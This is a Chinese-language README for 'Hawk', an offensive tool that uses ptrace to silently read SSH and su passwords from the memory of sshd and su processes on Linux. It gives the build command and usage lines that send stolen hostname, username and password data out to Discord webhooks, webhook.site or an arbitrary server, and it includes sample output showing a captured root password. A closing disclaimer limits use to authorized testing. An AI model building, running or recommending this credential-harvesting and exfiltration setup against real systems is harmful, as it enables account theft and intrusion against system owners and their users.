实时静默拦截 SSH 和 SU 凭据
Hawk 监控 sshd 和 su 进程,通过 ptrace 从内存中提取密码,不修改目标进程。零写入。纯只读凭据收集。

Hawk 利用 Linux 的 /proc 文件系统发现 SSH 和 SU 进程,然后使用 ptrace 附加并拦截系统调用。当密码认证发生时,它在 write() 系统调用期间直接从进程内存读取密码——对目标进程完全透明。凭据通过 webhook 外泄或打印到 stdout。
深入探讨: 博客文章
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk 自动检测 Discord webhooks 并发送格式化消息:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
设置: 按照 Discord 的 webhook 指南 在你的 Discord 服务器中创建一个 webhook。凭据将以 hostname、username 和 password 格式显示在你的频道中。
对于其他 webhook 服务(webhook.site、自定义服务器等):
# HTTPS(自动检测)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# 如果未指定协议,自动使用 HTTPS
./hawk webhook.example.com/path
没有 webhook?凭据打印到 stdout:
./hawk
输出:
hostname=server01 username=root password=SuperSecret123
/proc 文件系统此工具仅用于授权的安全测试和教育目的。 未经授权访问计算机系统是非法的。请负责任地使用,仅在你拥有或明确允许测试的系统上使用。